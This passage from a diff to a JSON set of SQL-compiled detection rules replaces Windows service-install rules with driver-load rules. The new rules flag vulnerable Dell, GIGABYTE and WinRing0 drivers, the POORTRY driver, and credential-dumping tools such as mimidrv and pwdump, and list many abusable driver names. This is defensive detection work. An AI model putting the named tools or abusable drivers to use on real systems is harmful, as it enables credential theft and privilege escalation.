@HeirhabarovT, oscd.community", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "status": "test", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1210", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], - "level": "critical", + "falsepositives": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "New Service Uses Double Ampersand 
in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - 
"title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", - "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Legitimate usage of the anydesk tool" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" ], - "filename": "win_system_service_install_anydesk.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. 
These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE 
'%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "PsExec Service Installation", - "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN 
('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_service_install_psexec.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of known vulnerable drivers via their names only.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE 